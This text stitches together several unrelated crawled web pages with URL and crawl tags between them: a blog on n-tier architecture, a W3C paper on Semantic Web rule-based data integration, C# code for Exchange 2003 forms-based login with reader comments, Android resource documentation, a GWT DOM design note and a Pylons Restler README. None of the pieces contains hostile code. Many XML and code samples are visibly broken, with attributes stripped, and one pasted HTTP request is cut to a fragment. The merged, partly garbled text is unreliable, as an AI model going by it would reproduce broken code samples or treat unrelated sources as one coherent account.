Loosely coupled code is code that allows for changes to business rules, data format, and other strategic elements of a system to be changed or updated. The Strategy Pattern is a design pattern that specifically addresses this very concept. With loosely-coupled code, you can change your data access strategy, your logging strategy, etc by simply creating a new implementation of a well-defined interface and then changing the behavior of the application to use the new strategy's implementation. There are many good techniques for achieving loosely-coupled systems.
For years it was been popular to create client-server applications where a GUI was created that was loaded with business rules that were tightly integrated into even more business rules existing inside of the stored procedures of a proprietary database. There was little, if any, separation of duties between presentation, business logic, and persistence. It only took a few years in the 90's for companies to realize this was a pretty bad idea. Next came the great Internet craze which led to the replacement of client-server applications with web-applications which were basically a GUI with a bunch of tightly integrated scripting code residing in templating engines that talked to a bunch of business-rule laden stored procedures. If anything, we actually took a step backwards from client-server with this model because now we had the same horrible coding practices combined with a stateless interface that compounded every one of the problems created by client-server. Yet it was the web, thus it had to be better, right? Well, websites grew, databases became overloaded, templating engines overloaded and systems broke with glorious regularity and public humiliation. Now, when your crappy client-server architecture hiding behind HTML was exposed to the public, the whole world could see the results.
This was when people started paying attention to the concept of n-Tier development. It was obvious that loading up a templating engine with a bunch of business rules was a bad idea; but ask most DBA's and they'll tell you (wrongly) that it's perfectly OK to stick a bunch of business rules inside of stored procedures. After all, Oracle wouldn't provide stored procedures if they weren't the perfect place to put business rules, right? Overnight we abandoned ASP and CGI for JSP and ASP.Net. We moved business rules out of our HTML generators and placed them in shared libraries that happen to execute in the webserver. Was it faster? Yes, it was, and often increased the amount of traffic that a website could handle by an order of 10; but it was still brittle. All of that fast-moving webserver code now overloaded the database which was being burdened not just with the demands of fetching data, performing sorts, indexing new data, etc, but also processing those business rules that the DBAs insisted needed to be in the RDBMS. Business then started pulling business rules out of stored procedures and into libraries of compiled code on the webserver; which upset the natural balance once again. Now the webserver was tightly coupled to it's business rules, which were tightly coupled to their data rules, which were still tightly coupled to the database. Will the madness ever end?
Yes; and thank goodness it did. By the early 2000's it became clear that the real solution for business systems that could succeed over long life-cycles was to create systems that can be scaled both vertically by adding more strategic features, but horizontally as well by adding redundant processing capability. Distributed computing was not knew, but good techniques for it were. The advent of web services led to the liberation of the enterprise application from the domain of a few web-jockeys and DBAs into the realistic world of team development with real standards, contracts, and *gasp* design documentation. Now we can separate business rules from persistence and presentation. We can run these separated layers in a diverse set of hardware that provides for the best technology for a specific aspect of the system to be used. We have destroyed the brittle barriers that placed roadblocks between our needs and our success. | http://it.toolbox.com/blogs/paytonbyrd/success-oriented-architecture-23415 | crawl-002 | en | refinedweb |
While there has been complaints within Web circles of too many standards being produced, and not enough clarity of vision between them, we feel that the addition of rules to the Semantic Web provides us a remarkable opportunity for tying together XML, RDF and OWL, and Web Services on coherent and sound principles. The goal is to solve the long-standing problem of data integration on the Web.
As more and more information on the Web is given in the form of XML, developers of Web rules should note the reason why XML has proven popular. Simply, it is the transmission of semi-structured data, with schema languages providing interoperability and XSLT allowing conversion of XML formats. However, while XML provides excellent serialization syntax, the grand challenge of data integration has yet to be met. Many industries have not developed schemas to simplify data exchange, and often data exchange will involve the combining of data from heterogeneous sources without shared schemas or schemas that have explicit mappings. Little progress has been on data integration because the sheer difficulty of the problem of intentional equivalence: When are two pieces of data about the same thing, such that one would use owl:equivalentClass, owl:equivalentProperty, or owl:sameAs? There is also the lack of standards to enable detection of equivalence for integration. Allowing data to be accessed by URIs allows the information to be Web-accessible, but this is the only the first step of data integration.
Ideally, one could have a set of rules that identify if two things are intentionally equivalent. For example, except in pathological cases, in the United States if two people share the same Social Security Number, they are the same person, and the Social Security Number can be taken to be an owl:InverseFunctionalProperty. However, most data will not have such an easily identified owl:InverseFuntionalProperty. Instead, heuristics in the form of rules will have to be developed to show equivalence.
For example, a person's name is not generally considered to be inverse functional properties, since many people share the same name. Likewise, an address may have more than one person at it. However, the combination of a shared name and a shared address by two individuals is likely to result in those being the same person. It is even more likely if the same birthday is shared. Lastly, these rules may trigger new information, such that the address is capable of having mail to sent to it, or even sending said mail automatically.
While there has been work on providing a common model theory for the XQuery Data Model and OWL/RDF [1], there has been little work on the problem of integration. First, one must be able to bind arbitrary XML to RDF and OWL classes. This can easily be done through XML Schema annotations [2], which allow arbitrary XML data to be modeled in the PSVI with user-specified OWL/RDF data. Note that this methodology on some level allows interoperability of arbitrary XML data with logical languages such as Prolog [3]. Using this technique, XML data can be marshalled into existing OWL/RDF databases. Yet the integration will be poor indeed unless one can discover when two different URIs are about the same thing.
For example, let us assume we have a knowledge base as given by the following TBox. This allows us to distinguish URIs about people from URIs about other things, and give people addresses, birthdays, and names. Only fragments of the ontologies and XML are given to conserve space.
<owl:Class rdf: </owl:Class> <owl:Class rdf: <rdfs:subClassOf rdf: </owl:Class> <owl:Class rdf: <owl:DatatypeProperty rdf: ....Then we have this information as given by our ABox:
<!--ABox--> <census:Woman rdf: <census:hasName>Alice Smith</census:hasName> </census:Woman> <census:Man rdf: <census:hasName>Robert Smith</census:hasName> <census:hasAddress> <census:streetValue>8 Oak Avenue</census:streetValue> <census:cityValue>Old Town</census:cityValue> <census:stateValue>PA</census:stateValue> <census:zipValue>95819</census:zipValue> <census:countryValue>US</census:countryValue> </census:hasAddress> <census:hasBirthday>1971-10-10T12:00:00-05:00</census:hasBirthday> </census:Man> ....
New XML information comes into our knowledge base in XML form: <> ....This XML can then be marshalled into OWL using Schema annotations or a custom made XSLT stylesheet, and the results integrated:
<census:Woman rdf: <census:hasName>Alice Smith</census:hasName> <census:hasAddress rdf: </census:Woman> <census:Woman rdf: <census:hasName>Alice Smith</census:hasName> </census:Woman> <census:Man rdf: <census:hasName>Robert Smith</census:hasName> <census:hasAddress rdf: <census:hasBirthday>1971-10-10T12:00:00-05:00<census:hasBirthday/> </census:Man> <census:Address rdf: <census:streetValue>123 Maple Street</census:streetValue> <census:cityValue>Mill Valley</census:cityValue> <census:stateValue>CA</census:stateValue> <census:zipCodeValue>90952</census:zipCodeValue> <census:countryValue>US</census:countryValue> </census:Address> <census:Address rdf: <census:streetValue>8 Oak Avenue</census:streetValue> <census:cityValue>Old Town</census:cityValue> <census:stateValue>PA</census:stateValue> <census:zipValue>95819</census:zipValue> <census:countryValue>US</census:countryValue> </census:Address> ....
Note that Alice Smith in the incoming XML document, since she only shares the same name as the Alice Smith as denoted the URI (given some default base namespace) "ASmith202-73-4598," is given a separate URI "genID:762" in the newly integrated knowledge base. However, because Robert Smith as denoted by the URI "RSmith786-36-721" shares the same name and address as the Robert Smith in the incoming XML document, the knowledge bases are merged and we know now Robert Smith's birthday (assuming our rule is correct). A rule should be able to express data integration of this style in a succinct manner.
In summary, we need a rule language to be able to merge the databases in a way such as described. These rules would ideally be easy-to-read and write, and given URIs such that they can be associated with data either explicitly in XML or RDF, or associated through the Post-Schema Validation Infoset. The rules should be ordered, such that the first rule looks for matching social security numbers. If that fails, it should look for matching birthdays, names, and addresses...and if that fails, backtracks and looks for matching names and addresses to determine equivalence. Perhaps another back-tracking could be made looking for only name equivalence. Regardless, any language based on back-tracking and an Horn clause formalism should be able to perform this functionality.
However, this avoids the obvious point: that it is more reliable to have a two resources judged to be identical by an inverse functional property like a social security number than the combination of two non-inverse functional properties such as name and address. The combination of a birthday, name, and address should be judged to be more reliable than just a name and address. Harry Halpin Junior could move into his father's house and not specify epithet or his birthday in an order form. To deal with these levels of inference, either the rules need to be solidified to perfection, or work on Web of Trust needs to be integrated into rules, so that certain rules can be trusted to be correct more than others. This could be formalized as probabilities, such that the combination of a name, address, and birthday is deemed more probable to solve the equivalence problem (an example probability of .8) than the combination of just a name and address (an example property of of .6), and than just sharing the same name (probability of .1). The probabilities could possibly be encoded as levels of trust. Related work has been done on probabilistic logical programming languages [4].
At its current state the Semantic Web is a specification language, while many people want to do things with data on the Web, not just specify the types of data. The Semantic Web Rule effort is clearly a move in this direction, and yet if it develops as a entirely divorced specification from Web Services and XML it may suffer difficulty in being adopted outside the existing Semantic Web community. The notion of how the Semantic Web may be bound to XML data must be addressed, and then if Semantic Web Rules can be shown to help solve the data integration problem, it will likely be a crucial victory for the entire Semantic Web, showing how XML and the Semantic Web are complementary and leading to adoption of the Semantic Web by more XML users.
It is almost obvious that regardless of syntax, Web Rules are going to be based on some sort of logical programming language like Prolog, but with Web extensions such as specified by the Rule Markup Language and others. However, Web Services are more and more being united under the framework of functional programming, and current XML programming languages such as XSLT and XQuery are functional languages. In order to simplify standards, it would be useful to see how functional and logical programming languages can be combined. There has been considerable work on functional programming languages that combine both functional and logical aspects, such as the Curry language [5]. Ideally, functional aspects could be used for Web Service composition and general data manipulation, while the logical aspects could be used for data integration. In return, developers of Web Services and the Semantic Web could use a single unified framework for Web programming. The current three-tier approach to data on the Web (scripting language accessing databases that display results in HTML) could be replaced by a more powerful approach that uses a Web-scale logical functional language to employ distributed OWL/RDF databases for both human and machine consumption. | http://www.w3.org/2004/12/rules-ws/paper/77/ | crawl-002 | en | refinedweb |
.
At first let's see namespaces I used in my code to get FBA stuff work.
using System.Text;
using System.Net;
using System.Security.Authentication;
using System.Web;
And here is the authentication method that returns session cookies if authentication succeeded. You can use these cookies if you have to execute WebDAV queries by example.
private CookieCollection DoExchangeFBA(string server, string userName, string password)
{
var uri = server + "/exchweb/bin/auth/owaauth.dll";
var request = (HttpWebRequest)HttpWebRequest.Create(uri);
request.Method = "POST";
request.CookieContainer = new CookieContainer();
request.ContentType = "application/x-www-form-urlencoded";
request.AllowAutoRedirect = false;
request.ServicePoint.Expect100Continue = false;
server = HttpUtility.UrlEncode(server);
userName = HttpUtility.UrlEncode(userName);
password = HttpUtility.UrlEncode(password);
var bodyString = "destination={0}&flags=0&username={1}";
bodyString += "&password={2}&SubmitCreds=Log+On&";
bodyString += "forcedownlevel=0&trusted=0";
bodyString = string.Format(bodyString, server,
userName, password);
var body = Encoding.ASCII.GetBytes(bodyString);
request.ContentLength = body.Length;
ServicePointManager.Expect100Continue = false;
var stream = request.GetRequestStream();
stream.Write(body, 0, body.Length);
stream.Close();
var response = (HttpWebResponse)request.GetResponse();
if (response.Cookies.Count < 2) throw
new AuthenticationException("Failed to login to OWA!");
return response.Cookies;
}
If you are using Exhange Server 2007 then you have different authentication address and you get back only one cookie.
Hi Gunnar,
Thanks for the post, I've tried your code (and some similar code I've written) but just get a 400 bad request back from the server when I try to make use of the cookieCollection:
Request.CookieContainer.Add(DoExchangeFBA("https://" + mailboxServer, "nwtraders\\dave hope", "Password"));
The raw http request looks like the following:=="
Content-Length: 141
Expect: 100-continue
<?xml version="1.0"?><a:propfind xmlns:<a:prop><d:oof-state/></a:prop></a:propfind>
Any ideas as to where I'm going wrong?
Thanks,
Dave
I have seen this error in rather weird situation. I wrote command line application that imports calendars data from Exchange to SharePoint. Everything worked fine. I decided to create SharePoint server timer job based on this code. Without any markable modifications this code is not able to work under SharePoint timer process. After authentication it always gets error 400 bad request.
Can you tell me more about your technical environment? Maybe it is possible to find out what is going on.
Thanks for the response!
We have multiple exchange servers. The code works fine against those which use Negotiate authentication but not those using FBA.
The code fails when making the request from the exchange servers itself. It's Exchange 2003 with all updates applied running on Windows 2k3 SP2 (again, with all updates applied).
Is there any specific information I can provide?
Thanks!
Problem solved! - I was doing two things wrong:
Not specifying the content-type in my request:
Request.ContentType = "text/xml";
The FBA login was redirecting, which I shouldn't have followed. Doing the following fixed it:
request.AllowAutoRedirect = false;
Thanks
Very good stuff! Do you have the same for exchange 2007
Best regards
Thor
Hello Thor!
Basically you can use this code also with Exchange 2007 but you have to make some little changes.
1. Exchange 2007 has different URL for authentication DLL.
2. There is only one authentication cookie for Exchange 2007
Custom C# application and Exchange Server 2003 integration over WebDAV was one of the tasks I lately
Hi,
This solution works fine.However we need to give "password" in this case. In a case when we are using default credentials, can it be done without password?
Thank you for posting this code. Are you able to offer me an example of how I might use your code to prevent the OWA login screen from appearing when a user clicks on a link to an inbox item? I am initially authenticating (successfully), passing a webDAV query, and returning & displaying the results on an .aspx (2.0) page. Within the results I have created anchor tags hyperlinked (using the exchange protocol format) to inbox items. However, when a user clicks on the item, the OWA login screen comes up. Specifically, how can I implement your code to bypass this screen?
Thank you,
Erik Snyder
If you want it to be done easily then use Windows authentication. Browser takes care of everything. Otherwise... try to put these session cookies to user's browser. See what happens.
Thanks for posting the code. But when tring to get the cookies we are getting 401 Unauthorized error. Could please let me know what could be the reason in getting 401 Unauthorized error?
Thank You,
KVL | http://weblogs.asp.net/gunnarpeipman/archive/2008/12/03/authenticating-programmatically-to-exchange-server-2003-fba.aspx | crawl-002 | en | refinedweb |
Editor.
Figure 21
And now let's make sure that our new
teardown method has cleared out the database.
Figure 24
And then take another look...
Figure 26
CB: There we go. Now that the recipes table is empty, let's run our category test again.
ruby test\unit\category_test.rb
Figure 27
Paul: That's more like it. But, and don't take this wrong CB, but that's really not what I'd call a complete test. It seems to me like we need to check a couple more things. First, Rails is telling us it changed "beverages" to "beverage" but we haven't checked to see if there's actually a record in the table named "beverage." And we haven't checked to make sure that there's not a record named "beverages" any more.
CB: I knew you'd be good in the tester role, Paul ;-) You're right. Let's add those tests. So now our test method looks like:
def test_read_and_update rec_retrieved = Category.find_by_name("beverages") assert_not_nil rec_retrieved rec_retrieved.name = "beverage" assert rec_retrieved.save changed_rec = Category.find_by_name("beverage") assert_not_nil changed_rec unwanted_rec = Category.find_by_name("beverages") assert_nil unwanted_rec end
So now when we run category_test.rb, we get
Figure 28
CB: So, we're sure that we can read and update records that are already in the table. Let's make sure we can create and delete records.
Paul: But haven't we already proved that with the fixtures setting up the table and the teardown method clearing it out?
CB: That's a good question, Paul. I think you can argue it both ways.
On one hand, we've definitely shown with the
read_and_update method that the database got loaded, otherwise there'd be nothing to read and update. And we took a peek at the table itself after running the recipe test and saw that the table had been emptied.
On the other hand, there are a couple of things that make me, personally, choose to go ahead and write a couple more methods to test the create and delete capabilities explicitly. First, I look to my test cases to tell me what an app does. If I don't put in methods to test the create and delete functionality, then I have to remember that the app does that but that it's being tested some other way. I guess I'm getting to an age where I'm less apt to trust my memory ;-) Second, my unit tests are testing the Model and I want to see that happen. If you look at the fixture files, you don't see any explicit use of Models per se. So if I've got a lot of trust in my memory, and I trust that Rails itself is working properly, I could argue the additional tests aren't really necessary. But when I've got on my Tester hat, my SOP is "show me," not "trust me."
It's not much work and it's not going to add significantly to our test execution time. So, I'm going to go ahead and add the methods to category_test.rb. Actually, I think I'll combine them like we did for read and update.
def test_create_and_destroy initial_rec_count = Category.count new_rec = Category.new new_rec.save assert_equal(initial_rec_count + 1, Category.count) new_rec.destroy assert_equal(initial_rec_count, Category.count) end
And then we rerun our test case, and...
def
Figure 29
CB: So now we're sure that, as it stands, our tests make us confident that our Category model is working as designed. Now let's do the same for our Recipe model. Open recipe_test.rb and replace the
test_truth method with: new_rec.category_id = 1 new_rec.save assert_equal(initial_rec_count + 1,Recipe.count) new_rec.destroy assert_equal(initial_rec_count, Recipe.count) end
And now we run the recipe test case...
Figure 30
And it looks like we've got the basics working there too. What do you think, Paul?
Paul: Pretty good so far, CB. Are we ready to start filling those holes we spotted?
CB: You bet. Let's use our tests to put a spotlight on them. The approach I'm hoping you'll help me introduce to Boss says it's best to put off writing application code until you have a failing test that demands it. Let's start with the Category model. In Rails, we use our Unit tests to make sure the Model is working properly. "Properly" means, at a minimum, the CRUD functionality that's at the core of pretty much all Rails apps. That's what we just wrote tests for. The next piece of "properly" means that the validations we need our application to do on the data being written to the database are working. And finally, we need to make sure that any methods we include in our Model are working.
We've decided that all our Category records have to have a name and that the length of the name can't be longer than 100 characters. And we've already seen that we're not currently enforcing that rule. Even if I hadn't given the name field a default value of an empty string, the way it sits right now, a visitor could hit the space bar and effectively do the same thing. So I'd say we're probably going to need to use both validations and a method to check for visitors entering blanks for the name. But let's let the tests tell us what we need.
So let's add another method to our category test case to make sure we only save records that have a valid name. First we'll try to save a record with no name and expect that save to fail, then we'll try to save a record that does have a name and expect it to get saved.
def test_must_have_a_valid_name rec_with_no_name = Category.new assert_equal(false, rec_with_no_name.save) rec_with_name = Category.new(:name => "something new") assert rec_with_name.save end
And now lets run it.
ruby test\unit\category_test.rb
Figure 31
And we'll change the assertions in the
test_must_have_a_valid_name and
test_long_names methods, so our category test case looks like ...
Figure 38
And we run our tests again to make sure we get the same results...
Figure 39!"
Bill Walton is a software development/project management consultant/contractor.
Return to O'Reilly Ruby. | http://www.oreillynet.com/lpt/a/7086 | crawl-002 | en | refinedweb |
clojure-dev is an integrated development environment (IDE) for the Clojure programming language, built on the Eclipse platform.
Installing it and starting testing/developing in clojure is really just a matter of minutes!
NEW RELEASE 0.0.34 (as of 2009/05/11) (see this announce for detail)
Quick links
Coarse grained roadmap
(in bold features already implemented)
- Source code editing:
- syntax coloring, rainbow parens
- interaction with the REPL
- auto-indentation
- Formatting
- Navigation
- a minima of JDT integration
- Code completion with source/java doc (first pass)
- REPL
- namespace browser
- navigate the tree of currently loaded libs
- symbol name/docstring based search feature
- syntax coloring
- code completion
- JDT integration
- auto-build feature coupled with the active REPL | http://code.google.com/p/clojure-dev/ | crawl-002 | en | refinedweb |
Resources are external files (that is, non-code files) that are used by your code and compiled into your application at build time. Android supports a number of different kinds of resource files, including XML, PNG, and JPEG files. The XML files have very different formats depending on what they describe. This document describes what kinds of files are supported, and the syntax or format of each.
Resources are externalized from source code, and XML files are compiled into a binary, fast loading format for efficiency reasons. Strings, likewise, are compressed into a more efficient storage form. It is for these reasons that we have these different resource types in the Android platform.
This is a fairly technically dense document, and together with the Available Resources document, they cover a lot of information about resources. It is not necessary to know this document by heart to use Android, but rather to know that the information is here when you need it.
This.
You will create and store your resource files under the appropriate
subdirectory under the
res/ directory in your project. Android
has a resource compiler (aapt) that compiles resources according to which
subfolder they are in, and the format of the file. Table 1 shows a list of the file
types for each resource. See the
Available Resources for
descriptions of each type of object, the syntax, and the format or syntax of
the containing file.
Table 1
Resources are compiled into the final APK file. Android creates a wrapper class, called R, that you can use to refer to these resources in your code. R contains subclasses named according to the path and file name of the source file
This section describes how to use the resources you've created. It includes the following topics:
At compile time, Android generates a class named R that contains resource identifiers to all the resources in your program. This class contains several subclasses, one for each type of resource supported by Android, and for which you provided a resource file. Each class contains one or more identifiers for the compiled resources, that you use in your code to load the resource. Here is a small resource file that contains string, layout (screens or parts of screens), and image resources.
Note: the R class is an auto-generated file and is not designed to be edited by hand. It will be automatically re-created as needed when the resources are updated.
package com.android.samples; public final class R { public static final class string { public static final int greeting=0x0204000e; public static final int start_button_text=0x02040001; public static final int submit_button_text=0x02040008; public static final int main_screen_title=0x0204000a; }; public static final class layout { public static final int start_screen=0x02070000; public static final int new_user_pane=0x02070001; public static final int select_user_list=0x02070002; }; public static final class drawable { public static final int company_logo=0x02020005; public static final int smiling_cat=0x02020006; public static final int yellow_fade_background=0x02020007; public static final int stretch_button_1=0x02020008; }; };
Using resources in code is just a matter of knowing the full resource ID and what type of object your resource has been compiled into. Here is the syntax for referring to a resource:
R.resource_type.resource_name
or);
A value supplied in an attribute (or resource) can also be a reference to a resource. This is often used in layout files to supply strings (so they can be localized) and images (which exist in another file), though a reference can be any resource type including colors and integers.
For example, if we have color resources, we can write a layout file that sets the text color size to be the value contained in one of those resources:
<?xml version="1.0" encoding="utf-8"?> <EditText id="text" xmlns:
Note here the use of the '@' prefix to introduce a resource reference -- the
text following that is the name of a resource in the form
of
@[package:]type/name. In this case we didn't need to specify
the package because we are referencing a resource in our own package. To
reference a system resource, you would need to write:
<?xml version="1.0" encoding="utf-8"?> <EditText id="text" xmlns:
As another example, you should always use resource references when supplying strings in a layout file so that they can be localized:
<?xml version="1.0" encoding="utf-8"?> <EditText id="text" xmlns:
This facility can also be used to create references between resources. For example, we can create new drawable resources that are aliases for existing images:
<?xml version="1.0" encoding="utf-8"?> <resources> <drawable id="my_background">@android:drawable/theme2_background</drawable> </resources>.
Many resources included with the system are available to applications. All such resources are defined under the class "android.R". For example, you can display the standard application icon in a screen with the following code:
public class MyActivity extends Activity { public void onStart() { requestScreenFeatures(FEATURE_BADGE_IMAGE); super.onStart(); setBadgeResource(android.R.drawable.sym_def_app_icon); } }
In a similar way, this code will apply to your screen the standard "green background" visual treatment defined by the system:
public class MyActivity extends Activity { public void onStart() { super.onStart(); setTheme(android.R.style.Theme_Black); } }:
MyApp/ res/ values-en/ strings.xml values-fr/ strings.xml
Android supports several types of qualifiers, with various values for each. Append these to the end of the resource folder name, separated by dashes. You can add multiple qualifiers to each folder name, but they must appear in the order they are listed here. For example, a folder containing drawable resources for a fully specified configuration would look like this:
MyApp/ res/ drawable-en-rUS-port-160dpi-finger-keysexposed-qwerty-dpad-480x320/
More typically, you will only specify a few specific configuration options. You may drop any of the values from the complete list, as long as the remaining values are still in the same order:
MyApp/ res/ drawable-en-rUS-finger/ drawable-port/ drawable-port-160dpi/ drawable-qwerty/
Table 2 lists the valid folder-name qualifiers, in order of precedence. Qualifiers that are listed higher in the table take precedence over those listed lower, as described in How Android finds the best matching directory.
Table 2:
drawable-en-rUS-landwill apply to US-English devices in landscape orientation.
values-mcc460-nokeys/
values-nokeys-mcc460/
drawabledirectory must be named
drawable-port, not
drawable-PORTor
drawable-Port.
drawable-rES/and
drawable-rFR/, containing identical files. You cannot have a directory named
drawable-rES-rFR/.
res/drawable/drawable-en.
All resources will be referenced in code or resource reference syntax by
their simple, undecorated names. So if a resource were named this:
MyApp/res/drawable-port-92dpi/myimage.png
It would be referenced as this:
R.drawable.myimage (code)
@drawable/myimage (XML)
If several drawable directories are available, Android will select one of them (as described below) and load
myimage.png from it.
Android will pick which of the various underlying resource files should be used at runtime, depending on the current configuration of the device. The example used here assumes the following device configuration:
Locale =
en-GB
Screen orientation =
port
Screen pixel density =
108dpi
Touchscreen type =
notouch
Primary text input method =
12key
Here is how Android makes the selection:
drawable-fr-rCA/directory will be eliminated, because it contradicts the locale of the device.
MyApp/res/drawable/ MyApp/res/drawable-en/Exception: Screen pixel density is the one qualifier that is not used to eliminate files. Even though the screen density of the device is 108 dpi,
MyApp/res/drawable-fr-rCA/MyApp/res/drawable-en-port/ MyApp/res/drawable-en-notouch-12key/ MyApp/res/drawable-port-92dpi/ MyApp/res/drawable-port-notouch-12key
drawable-port-92dpi/is not eliminated from the list, because every screen density is considered to be a match at this point.
Exception: If the qualifier in question is screen pixel density, Android will select the option that most closely matches the device, and the selection process will be complete. In general, Android will prefer scaling down a larger original image to scaling up a smaller original image.Exception: If the qualifier in question is screen pixel density, Android will select the option that most closely matches the device, and the selection process will be complete. In general, Android will prefer scaling down a larger original image to scaling up a smaller original image.
MyApp/res/drawable/MyApp/res/drawable-en/ MyApp/res/drawable-en-port/ MyApp/res/drawable-en-notouch-12key/ MyApp/res/drawable-port-92dpi/ MyApp/res/drawable-port-notouch-12key
Only one choice remains, so that's it. When drawables are called for in this example application, the Android system will load resources from theOnly one choice remains, so that's it. When drawables are called for in this example application, the Android system will load resources from the
MyApp/res/drawable-en/MyApp/res/drawable-en-port/ MyApp/res/drawable-en-notouch-12key/
MyApp/res/drawable-en-port/directory.
Tip: The precedence of the qualifiers, so
drawable-port-notouch-12key is out.
This flowchart summarizes how Android selects resource directories to load..
The Available Resources document provides a detailed list of the various types of resource and how to use them from within the Java source code, or from other references.
Coming Soon: Internationalization and Localization are critical, but are also not quite ready yet in the current SDK. As the SDK matures, this section will contain information on the Internationalization and Localization features of the Android platform. In the meantime, it is a good idea to start by externalizing all strings, and practicing good structure in creating and using resources.
← Back to Resources and Assets | http://developer.android.com/guide/topics/resources/resources-i18n.html | crawl-002 | en | refinedweb |
Joel Webber, Bruce Johnson
Recent enhancements to GWT's treatment of the JavaScriptObject (JSO) class in GWT 1.5 have made it possible to extend JSO with user-defined subclasses having arbitrary methods.
The GWT 1.5 UI library uses this newfound capability to more accurately model the W3C Node and HTML Element type hierarchy. In addition to aesthetic improvements in GWT-based DOM coding, the new model provides a more consistent and reliable cross-browser DOM API than JavaScript/DHTML itself because it builds on GWT's deferred binding approach to browser quirks specialization.
This enhancement involves the introduction of a new class hierarchy that extends the JavaScriptObject class. A sketch of the hierarchy is listed below, although individual methods are too numerous to list. (See the related patch for full details.). These class names mirror the W3C HTML specification (including their inconsistencies, such as LIElement vs. OListElement).
JavaScriptObject
Node
Text
Document
Element
AnchorElement
BodyElement
ButtonElement
DivElement
FieldSetElement
FormElement
IFrameElement
ImageElement
InputElement
LabelElement
LegendElement
LIElement
OListElement
OptionElement
SelectElement
SpanElement
TableCaptionElement
TableCellElement
TableColElement
TableElement
TableRowElement
TableSectionElement
TextAreaElement
UListElement
Event
NodeList
Style
These classes take advantage of GWT's new JavaScriptObject method support to directly implement DOM methods such as appendChild(), setAttribute(), and so forth.
This new, more explicit model has many benefits. Most obviously, the new classes clean up the aesthetics of DOM coding in Widget implementations and other straight-to-the-DOM programming tasks.
Consider this example of a previous implementation from GWT 1.4:
Element getCellElement(int row, int col) {
return DOM.getChild(DOM.getChild(tbody, row), col);
}
This looks much nicer when rewritten in GWT 1.5 like so:
Element getCellElement(int row, int col) {
return tbody.getChildElement(row).getChildElement(col);
}
Prior to GWT 1.5 JSO improvements, GWT developers often needed to use JSNI to accomplish low-level operations in JavaScript. For example,
private native Element getCellElement(Element table, int row, int col) /*-{
var out = table.rows[row].cells[col];
return (out == null ? null : out);
}-*/;
This has a few disadvantages:
The new JSO support and Element subclasses allow the same code to be written fully in Java code:
private Element getCellElement(TableElement table, int row, int col) {
return table.getRows().getItem(row).getCells().getItem(col);
}
All of the above objects, with the exception of JavaScriptObject and Event, will be created in the com.google.gwt.dom.client package. Part of the DOMImpl abstraction (and its related browser-specific implementations) will be moved into this package as well.
For backwards compatibility, all existing interfaces (i.e. DOM, Element, and Event) will remain in the com.google.gwt.user.client package, with the following changes:
The only required change to the user.client.ui package will be to loosen the type of the argument to setElement() (it will accept dom.client.Element), add an overload of setElement() that takes user.client.Element (so that existing classes that override it will not break), and add a getRootElement() that will return dom.client.Element.
These changes are 100% backwards compatible with existing code. One slightly unfortunate side-effect of this is that UIObject.getStyleElement() still returns user.client.Element. It is tempting to replace its return type with dom.client.Element (existing overrides would remain correct through covariance), but this would run the risk of breaking callers (see the next section for an example of how you can deal with this in practice).
If there are now two Element classes, which one should I use? For new code, you can always use dom.client.Element. The old Element class has no new methods on it, so you lose nothing by doing this, and gain direct convertibility (though a simple typecast) to its subtypes (e.g. ButtonElement).
Converting existing code to use Element methods (instead of calls to static DOM methods) is very straightforward. Almost all static DOM methods have obvious equivalents on dom.client.Element. The only exceptions are event handling methods (see below) and the methods that allow you to enumerate child Elements by index. These latter methods are not directly exposed in the Element API because they were not a great idea in the first place -- they look like they should run in constant time but are in fact linear time on all other browsers than IE.
If you do need to work with both Element types in the same code (which should occur very rarely), keep in mind that they're freely convertible because of the way JavaScriptObject works (see JavaScriptObjectRedesign for details).
The Event object has also been extended to provide methods to directly access its properties and functions. It also contains static helper methods for sinking events on Elements (specifically, sinkEvents() and getEventsSunk()). This object was not moved into the dom package because it is not clear that this is the best, or only, way to deal with Javascript event handling.
The above changes will not affect existing widgets (the only change to user.client.ui being the aforementioned tweaks to UIObject). Once these changes are committed, we can update the existing widgets to use the new interfaces. This will be effectively a no-op, but lead to much easier to read widget code.
All of these changes would be worthless if they imposed any performance or size overhead on the JavaScript produced by the GWT compiler. Fortunately, the compiler has gotten very good at throwing away extra levels of abstraction. The following examples of compiled output confirm this in practice.
The first example uses the existing DOM methods to manipulate a <button> element:
com.google.gwt.user.client.Element elem = DOM.createButton();
DOM.setStyleAttribute(elem, "color", "green");
DOM.setInnerText(elem, "foo!");
DOM.appendChild(RootPanel.getBodyElement(), elem);
The second uses the new Element interfaces to do the same thing:
com.google.gwt.dom.client.ButtonElement elem = Document.get().createButtonElement();
elem.getStyle().setAttribute("color", "green");
elem.setInnerText("foo!");
Document.get().getBody().appendChild(elem);
The following is the compiled output on Internet Explorer. Note that it's identical in both cases.
var elem = $doc.createElement('button');
elem.style['color'] = 'green';
elem.innerText = 'foo!';
$doc.body.appendChild(elem); | http://code.google.com/p/google-web-toolkit/wiki/DomClassHierarchyDesign | crawl-002 | en | refinedweb |
RESTful + Controller = Restler
Restler is a base controller for Pylons projects that provides a set of default RESTful actions that can be overridden as needed.
Quick Start
Install Pylons 0.9.7
easy_install Pylons==dev
Development of Restler is currently done with Pylons 0.9.7rc1dev
Install Restler
easy_install -U Restler
Or, install from the latest trunk:
svn checkout Restler cd Restler python setup.py develop
Note: If you have problems with the easy_installed version of Restler, try the SVN version, which may have fixes that I haven't yet uploaded to PyPI.
Create a new Pylons project
paster create --template=pylons MyProject cd MyProject
Add your database configuration to development.ini
Add a line like this to the [app:main] section:
sqlalchemy.dburi = <db_type>://<user>:<password>@<host>/<database>
Replace <db_type>, <user>, <password>, <host>, and <database> to reflect your setup. For example:
sqlalchemy.dburi = sqlite:///%(here)s/myproject.db
Create a base RestController that's aware of your project's model
Open myproject/lib/base.py and add the following lines below the existing imports:
import restler RestController = restler.make_rest_controller(model)
You can also create a new RestController class in lib.base that inherits from restler.BaseController. Here's an example that shows a quick and dirty way to secure the actions that cause modifications:
class RestController(restler.make_rest_controller(model)): def __call__(self, environ, start_response): return super(RestController, self).__call__(environ, start_response) new = edit = create = update = delete = lambda *args, **kwargs: abort(403)
In real life, you'll probably want to use AuthKit or something similar to protect these actions.
Note: The default BaseController generated by paster when creating a new Pylons project is used by the default error and template controllers.
Create some SQLAlchemy mapped orm classes in model/init.py
Create a controller for each of the Entity classes declared above
Map URLs for resources/entities to controllers
Create the database tables for the entity classes you declared above
Fire up your Pylons app and try it out
paster serve --reload development.ini
You should now be able to Create, Read, Update, and Delete resources.
Look at all the things I'm not doing
Epilogue
Restler was originally extracted from the byCycle.org Bicycle Trip Planner ().
